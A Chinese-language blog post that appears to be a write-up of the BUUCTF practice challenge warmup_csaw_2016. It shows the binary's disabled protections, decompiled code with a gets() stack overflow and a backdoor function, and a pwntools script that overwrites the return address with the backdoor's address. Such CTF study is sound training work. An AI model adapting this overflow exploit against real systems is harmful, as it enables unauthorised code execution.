[buuctf] pwn-warmup_csaw_2016

warmup_csaw_2016

查询文件保护措施

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments

64位程序，不能修改GOT表，其他保护都没开，ida分析

存在后门函数

int sub_40060D()
{
  return system("cat flag.txt");
}

主函数如下

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  char s; // [rsp+0h] [rbp-80h]
  char v5; // [rsp+40h] [rbp-40h]

  write(1, "-Warm Up-\n", 0xAuLL);
  write(1, "WOW:", 4uLL);
  sprintf(&s, "%p\n", sub_40060D);
  write(1, &s, 9uLL);
  write(1, ">", 1uLL);
  return gets(&v5, ">");
}

存在栈溢出漏洞，溢出到后门函数即可

from pwn import *
r = remote('node3.buuoj.cn',26140)
fun_addr = 0x40060D
payload = b'a'*0x48+p64(fun_addr)
r.sendline(payload)
r.interactive()

posted @ 2021-03-08 21:42 寒江寻影阅读(85) 评论(0) 编辑收藏举报

刷新页面返回顶部

寒江寻影

[buuctf] pwn-warmup_csaw_2016

warmup_csaw_2016

公告